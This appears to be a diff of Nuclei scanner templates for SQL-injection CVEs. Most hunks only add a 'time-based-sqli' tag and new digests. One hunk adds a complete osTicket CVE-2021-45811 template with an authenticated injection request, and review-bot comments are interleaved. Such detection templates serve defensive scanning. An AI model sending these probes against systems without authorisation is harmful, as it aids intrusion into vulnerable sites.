- 'contains(content_type, "text/html")'
- 'contains(body, "{\"status\":true")'
condition: and
# digest: 4b0a00483046022100bd6a79cdc594a3023fb8e143f8b3806237e2d1b610802729545d42772e7340e10221008215d1a8a12f869971241e710ddfd7c6f663f9e5a94326ce397d081c4f966528:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100bbcac16e6b972a8c13c9203a2eefab2763405a60eeac14738446293105ddcd85022100af007241e9719b7a25b44ede01a84b75fd606f0d58375c6b77f3a50f8a4dfabb:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/
fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/
publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp
tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp
variables:
text: "{{rand_base(5)}}"
@ -49,4 +49,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Please enter the email you registered with")'
condition: and
# digest: 4b0a00483046022100baf26aa77d293a650d638df6fa36214c0344ec2c80457d29c0cec194f81aa415022100ab4c0c9979d914df0d42b4b1c65aae34aff3194e9127bdf1aa5c9d1fed8fdf11:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207bcb83ddc3ca2854b007d61bfce62f3e96e14119f6eb4798a2eec83b287fe9ff022100cccabc9e7b99444bfa23b3badaac419c8f3ee16951c27ecf13165a4892fe6d5a:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: webnus
product: modern_events_calendar_lite
framework: wordpress
tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus
tags: time-based-sqli,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
condition: and
# digest: 490a00463044022005a0ed6fd4a954f355471debb3135a50f8aa1fc8f46d755cdf7ec6fbad2ebb11022005f3d8ac225181d1a9a4a8514d1810eb4fee21dc685447ccceea3418b5f6a24c:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205ad6223a657a0318d15e4003c38dce2d9781705d2d06f7f50a4e8a372cf24f5f02200cfe153e0bd8c4ee1258e08ce63c0041c0faaddafca973ee4d272d4db3530b40:922c64590222798bb761d5b6d8e72950


@ -34,7 +34,7 @@ info:
fofa-query: body=/wp-content/plugins/paid-memberships-pro/
publicwww-query: /wp-content/plugins/paid-memberships-pro/
google-query: inurl:"/wp-content/plugins/paid-memberships-pro"
tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios
tags: time-based-sqli,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios
http:
- raw:
@ -54,4 +54,4 @@ http:
- status_code == 200
- contains(body_2, 'other_discount_code_')
condition: and
# digest: 4a0a0047304502210080b4fd1ea8002928950a4be85999cc9bb3e3d35dd99ca34564c39556ae1544b002207c4249f959342254d0c492ed59ccd668a4925e63f456d78f2483e98a274c11b9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d93679fda0ec3270f9aee76d52bf8e1ca48f00c51c65e7ead923cf9754051f3f02207f42cd9a38d4ccdc79c2d046b8a65f80379192372894f7c36a41c1072e0f7c51:922c64590222798bb761d5b6d8e72950


@ -31,7 +31,7 @@ info:
- html:"AURALL"
- http.html:"aurall"
fofa-query: body="aurall"
tags: cve2021,cve,sqli,void,aurall
tags: time-based-sqli,cve2021,cve,sqli,void,aurall
http:
- raw:
@ -51,4 +51,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "Contacte con el administrador")'
condition: and
# digest: 4b0a00483046022100b913f246ed52547b6cf8d38eeb886a9c8e6ccdfd54a5fb9dfed931be1b37c98e022100f1d8901f4edf04df3a1e544f734cd3941996ac96dc7776e05744fcacf027eac5:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502200282e1486bd120a0f9c250940fd4924b958940ec669b60c7119709378b704265022100c7886cb6efe4950af5d454aff9e4fd05c0e5c757f09ae284b4f7d40d1d178d6c:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Doctor Appoinment System")'
condition: and
# digest: 490a0046304402207973d618635cb6ff182dd1151b2e15fef7b49ef6f6e99fbf1ef6b1f6f0f5cd64022038423bf061c1df525cfb84ab33d32f3681ff677745b0341ea30b995d34b637b5:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221009a413cfe8323f7b60e6d44eef643b270bce02d1a7d91553da330fa3d256b4f06022100d25274ea18a85655e67d4612c0615304e37f1047e76c2e150aea74baafdd8a36:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4a0a004730450220608993eb6c162f41af6eca78ee5e37966f90692f167c67e2f39623c90a6af11d022100bab80bd88b7acfd20895fdd9f38e249825760da11586f3cb851af29d59def924:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e2cf3abe851fb2c16b60644bcc286522bbe51cc52155a0079a02e25595c667ca02200df7ed25d96d01b78bd1b26e3c448e057d73fea56e2e06342982e2008e85eaae:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4a0a0047304502205af27187e0d2039416c9a8f9600f75e28215199929e4ad988cd03e84e61c370d022100c759b577ed0406b9390cffefba1486233e1f5ebcd24930bed0d401d54a95459e:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402202846631256391e911fe49c920be9b5c69fc171b1f19ad1ba982bdb67a2289b310220640c20f73f5c1f529fac4607b62fda57411a3ea82d53f2b4c0bf6d284926e49a:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4b0a004830460221009797e9869eb4d890a89391acc0795035af747ff5958931398e1e077d3f751e79022100d9e31261c293f7762348e4477ec1478a4f49a059fc8e4f1f513e7cfb025edb9b:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100fc3a47263f7babfff09eac1ce8a5de5ac19c63e853d4e90804da002880a18109022100c5e3852e81329ca6eb06f6e5779c1d722ac578ec4f74f73ca284c7ad67d367d5:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
max-request: 1
vendor: doctor_appointment_system_project
product: doctor_appointment_system
tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 500'
- 'contains(body, "Medical Management System")'
condition: and
# digest: 4b0a00483046022100e19069ba819c51cbb906a921026dc33a3ea4777dfdfde261cd3eecc4bdf2f60b022100aaff811bc5771e0fa07652ec9066319676fe5ee3edf3f665b969a24c584788c3:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220153004a0e168cfb9d937164ef1e1d4085ca6f498cbe11e517f162873f2094f1f02207bc78cae2230febb403b765b6ae5f3a17b24fdbf2ea083a7672629a8fc420158:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: prestashop
product: prestashop
shodan-query: cpe:"cpe:2.3:a:prestashop:prestashop"
tags: cve,cve2021,sqli,prestshop,edb,prestashop
tags: time-based-sqli,cve,cve2021,sqli,prestshop,edb,prestashop
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# digest: 490a0046304402204d4902f51f560fcf0ded1e355944479986a26099d29a7f3247c2c0a35fb533e402204b3ddd6af36676a8993b163161d15f67e560f97d3e61e4a0d1cd13004d189c64:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022017d64e2bcae0f187ce3857267bdda7bb3f7c956f2f6c62028916929f30883ffd022100c627319a056fd24f0bd2267d75af6075cc71aef79ef43d236a377a56d7c4f5dc:922c64590222798bb761d5b6d8e72950
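Review bot: The rewritten `tags` line still carries `prestshop`, which looks like a misspelling of the `prestashop` tag that sits at the end of the same list. Since this line is being edited anyway, either drop the misspelled tag or, if it is kept on purpose so that existing tag filters keep matching, say so in the commit description.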


@ -31,7 +31,7 @@ info:
product: cachet
shodan-query: http.favicon.hash:-1606065523
fofa-query: icon_hash=-1606065523
tags: cve,cve2021,cachet,sqli,chachethq
tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "pagination") && contains(body, "data")'
condition: and
# digest: 4a0a0047304502207d446c3957624653dc008a7ab15069eeed694d1099c94c6c977a81d0102dd05a022100d4e4d4f86b4d2f06d8966f18d607297ad2bc92f0fe4a9083ec4da8b419a74743:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022034663351e65790c6811b5d318fe212fedff9d5eac2aeb9c01e05122b56f7f0a302204e86e7e7ff57fe1b1e17e7e1e84b05165b4878951b171a7d025162d75e4dca52:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,68 @@
id: CVE-2021-45811
info:
name: osTicket 1.15.x - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://members.backbox.org/osticket-sql-injection/
- https://nvd.nist.gov/vuln/detail/CVE-2021-45811
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-45811
cwe-id: CWE-89
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2021,osticket,sqli,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance")
# digest: 490a0046304402205cc02f7b820e5331fe9be93e73d2a1386287fc72bdc45ff952a4c37b8bda3866022030d6880a65c877c244a1b41bf61374798ab06cfb371593bd22ee05a96189a8bc:922c64590222798bb761d5b6d8e72950
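Review bot: Nothing in the second `http` block confirms that the `POST /scp/login.php` request actually authenticated before `body_2` is evaluated, so a run with wrong or unset `username`/`password` looks the same as a patched target. The template also never states that these two variables must be supplied; a comment above `flow:` such as `# requires credentials: -var username=<user> -var password=<pass>` would make that explicit. The login goes to the staff panel under `/scp/` while the probe requests `/tickets.php` at the web root; if osTicket keeps staff and client sessions separate (worth confirming against the referenced advisory), the search would not run in the authenticated context and the check would silently miss. Finally, `remediation` says only "later version"; naming the fixed release from the advisory would let operators verify that an upgrade closes the finding.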


@ -29,7 +29,7 @@ info:
shodan-query: http.html:/wp-content/plugins/popup-builder/
fofa-query: body=/wp-content/plugins/popup-builder/
publicwww-query: /wp-content/plugins/popup-builder/
tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli
tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'contains_all(body_2, "first name", "last name", "email")'
- 'contains(content_type_2, "application/octet-stream")'
condition: and
# digest: 4b0a00483046022100a5e5bdb6821dc08d643eb1c9f95862b8116cf731542887e87ce5a5ed42b204700221008d7575ffb8f524c90d05db2e9bbd5e0ce26c0b8e227622602cd1f104061c73c2:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100bf716bf9543e60115d96900d93a63ba1b0d62e7936b9c6a98688c71a43256702022100b8d5167cf275f82cfabcd3f5b016e33e9b8b36b5bd4a78d1a9cf1814ed8a453a:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: wpdeveloper
product: notificationx
framework: wordpress
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper
tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper
http:
- raw:
@ -49,4 +49,4 @@ http:
- 'status_code == 200'
- 'contains(body, "\"data\":{\"success\":true}")'
condition: and
# digest: 4a0a00473045022066280e6a47e91352d98cb30291c051553c64ce566f4b4058a6b38c69f618dca2022100e774340b4d23c31810dcf915c1a593ca0237c07a9dfd39f79842b6feaca32ca3:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100af31781e382fb73a08452401889431cc023d94e6e793e41597937b41cc2a5580022100fcbd14f71e6b2da2240a56aa46dbfaadcc3b3f8b279ba313effc07c87ad27b01:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
tags: cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
http:
- raw:
@ -53,4 +53,4 @@ http:
- type: status
status:
- 400
# digest: 4b0a00483046022100b6e4d0f3cf3083a6266de8390edc1edef6d598356cfce15241e5e052a6bcf2ff022100b035a1ed11b0738ead2d5d28393b784c66d899fee448212efc636ff59b11add8:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100bf6465b533da10a708e3590108af2902d2a31c0c163cf47151dd80876b90ecd902201150103e2c55f6df450110650eb092713f43dfb7372cd868af8565bb86621dde:922c64590222798bb761d5b6d8e72950


@ -31,7 +31,7 @@ info:
fofa-query: body=/wp-content/plugins/wp-statistics/
publicwww-query: /wp-content/plugins/wp-statistics/
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs
tags: time-based-sqli,cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs
http:
- raw:
@ -60,4 +60,4 @@ http:
regex:
- '_wpnonce=([0-9a-zA-Z]+)'
internal: true
# digest: 490a004630440220035f12a4154a350d60447d690b6c52d7ff3ec9d78006be2879d49e848dd1ddf10220529c5ae15af4a1889b7ccb1e505d046daf41c212c9ff5926ad7818f19e2f5c12:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e26860d278f256bcc846af089c9e6eb40d552ede910fbddb3c5619c1b9cf2969022100d2adf42556aee426785fa1e641f4bf677935e837fd990f2f24efda812ebde0c2:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
product: commonsbooking
framework: wordpress
google-query: inurl:/wp-content/plugin/commonsbooking/
tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir
tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(header, "application/json")'
- 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
condition: and
# digest: 4a0a00473045022100dea516f929140a2e2296985cd78a610dc540408796d4ac65fb462ea4200221ec02204757fe9ea8722ca648c35531743432d486f7d889c7b60b6529123bd0d7c443bd:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221009f6a62af9597b8c3d1910fadc250bad189b5a22c33e78d82e1a10b161f3572bc02205145b6a9ccf3b69a6a8bd23c1353e7ba90db663888256e6bd5ab81d8f64f7864:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: devbunch
product: master_elements
framework: wordpress
tags: cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch
tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Post Meta Setting Deleted Successfully")'
condition: and
# digest: 490a0046304402204f01877da9668618a31c134174c0b1db2eeb1fd33ee26b77bdd0fed4b5a611dd02206407d8588548171f5e8dc630122584d4c228b43379770ceaa7dfd300e960c4e0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e693d603ea6398215e74879c15e496047477f4343461046dac6e9ae027bde52902206665f561033c3f6a9d32e975ea9da5abffdb99689fb2c1b499ad084cb8702f25:922c64590222798bb761d5b6d8e72950


@ -29,7 +29,7 @@ info:
vendor: quantumcloud
product: infographic_maker
framework: wordpress
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud
tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'contains(content_type_2, "text/javascript")'
- 'contains(body_2, "show_ilist_templates")'
condition: and
# digest: 490a004630440220659dd6e81b56b7ad2ca5e164674d68e908074273a0e522aa11bbe64016520f3a02207cd44466e380af3765f85808195b17dc6e318a354fb70704520099f6e978103e:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022065454519399c9c6f45787b0ff07a1b1773963ffb30db52102b08645e7aee8dcd02205ea41986885d388e85018ef9d86da90d4b452efce0318bc0e0fb74cab0714064:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: quantumcloud
product: simple_link_directory
framework: wordpress
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud
tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "vote_status") || contains(body, "critical error")'
condition: and
# digest: 4a0a004730450221008335e1b503013fdf95af325dc2cd7775ecc4a69d509ffd7d9f3e058d0d0f0f36022040ddab9ea922ffdf58d0e2f057aad3e53d5c0ff7946897f4d3f3da3105c0776d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100de19f0c89c65bdd3d6e4f1ab16529ddcc17caef25172961832f4097889b0648b022066bcb91b91972cca839d631d32692be65ca3fb593a5bd40a879598c22aca1448:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: usersultra
product: users_ultra
framework: wordpress
tags: cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra
tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "You have to be logged in to leave your rate")'
condition: and
# digest: 4a0a0047304502202c86f8644cb483f5c622c81dc5f3c84f10db3835fa21a49497270c6ef42cc868022100d4fcdb326b1bb65c5056f8e677aad1fe82328ed18bc6d80f5890f2456e405b8e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022051e07e9fad1853ad143f9747a2830720208c1b7d848b081c1877243a6b6a9cc7022100a79cf97012038bd6c899595add46debc31ddf60d43344074f6a7042defceebb1:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: documentor_project
product: documentor
framework: wordpress
tags: cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project
tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project
http:
- raw:
@ -51,4 +51,4 @@ http:
- 'contains(content_type_1, "text/html")'
- 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
condition: and
# digest: 490a0046304402205f2cc03db340617761a1fa935180c834e2ffa82c932c1189a14dfcb1d06333f70220105b6b52747cdf5d6f4ad6ca85ab86c5cd0f844d3a8a8d75cec26b186467f283:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204a297207b55918fa80abc7b2fabd54eebf93cc3e98c031b8fb74ab0b54739296022012e42fafada21fb35db7eab86787a32a560b2da932303f1ffe2a6967aaa1b1d7:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: title_experiments_free_project
product: title_experiments_free
framework: wordpress
tags: cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project
tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
condition: and
# digest: 490a00463044021f1195a13a42ffdab24fe1a153051ee57e125fe5d1aa81e77333ae6af0d54794022100de53b58284ec8656a4b09537d5f58ff210002891439cc282e725071c8681e4bc:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b51bc538dbe9eb8b81c9a46c95f53fac7b85bbaf5684f20e891460214c539d0902203cd29b53302e0cc5fa161915570cc9de65b35f769c9d797445a00e3c0b8770eb:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: daily_prayer_time_project
product: daily_prayer_time
framework: wordpress
tags: cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project
tags: time-based-sqli,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
condition: and
# digest: 4a0a004730450220339f76f6589f61d951c6df49eebd9765622f4b1fc106f4f0baaa2c769568a0a2022100c9f4eb1905e780de95cb4f89bc8dcebc93ad8fa3134478bb83af9abf03ee8be7:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220378d854bb8f28e49f9e65a11242638788ce63730696c9a768b80cbcaf04f394f022024e9f6367047c59dd724b93deabe92095ec7fe5901c1ab72fa6f038b980d7bab:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: iqonic
product: kivicare
framework: wordpress
tags: cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic
tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "Doctor details")'
condition: and
# digest: 4a0a0047304502202a56024067a27384463e32cf94905a97b100cc76d3a7f2e0129ad457e5630b20022100bb7206169a39c10a0a38f769961c00d3cbb7a2b161ead9618270e7b6ace9395a:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210094f4a84c32850306a9912fc54dab1cce497aca3ad31b35a4af79c06f7e653de3022100b93e017cc2bdde695bc9f40ec562bc59bdd7ebf2d10a39440bb4c61016adc704:922c64590222798bb761d5b6d8e72950


@ -26,7 +26,7 @@ info:
vendor: limit_login_attempts_project
product: limit_login_attempts
framework: wordpress
tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
tags: time-based-sqli,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
http:
- raw:
@ -46,4 +46,4 @@ http:
- contains(header, "text/html")
- contains(body, 'iTotalDisplayRecords')
condition: and
# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202120fd60a49a9ad2129fa0c1295710b0b3936bd777ef6632dcfee0fbb09e8adb022100a0ab87653ba456f6b9e4a6dc4123ae9a8e976284a60c0ec8d08a06b6a6630794:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: wpmet
product: wp_fundraising_donation_and_crowdfunding_platform
framework: wordpress
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet
tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")'
condition: and
# digest: 4a0a0047304502203494c2230989c5f71f85250dd906fc72494d29c3e4bf6084791c65bb4734921a022100ecef4474e9c6722b9cfcab205809d07c8692763004fb0cd88d618ea14c276154:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ab157f53f7aeb426a1ae70c22aeeb3a2de7b551e5c584f23c48a6dbc9a5efdac022074d8b85768ec6026da338f19ce9836e2c0d546a9ab033bd53488a97a700402f1:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: wp-video-gallery-free_project
product: wp-video-gallery-free
framework: wordpress
tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project
tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "Registred videos :")'
condition: and
# digest: 490a0046304402202a667e41a338568765d9f7aa1f4bdaba5ba1fe329f7e76d1604f88b8b15c86300220781f39a95fdbf7a898f37621269bdffe2dc51e93cfba278a4a03db4d358afdff:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022007b8f2b42d4f7135fb49e52ece5e0caea22a8e6dddbaca544b7ced5a362d095f02200b55556cfb540bccd8cf6e89af1fa4356eeb9804feb1ae98d7dffc72b3d49628:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: presspage
product: bestbooks
framework: wordpress
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage
tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage
http:
- raw:
@ -49,4 +49,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Account added successfully")'
condition: and
# digest: 4b0a00483046022100db95e6660d66b18ab8ce734b9b438e2a4d2626c8b35c7227bb18ddde1a18bcdc022100fb81b33fe69ad1b275eaf4390e07eeb8d34f9fc1035eb938f7f1be4fcb30a916:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100fee8ac38bbeddcaed2a1ea3ab43d4905849b48bed184b5c52f5aee416f0785bc0220648f311af296481fbe909ccc6a77df5f8d6d3846b66856b566a2e83e74c59cc0:922c64590222798bb761d5b6d8e72950
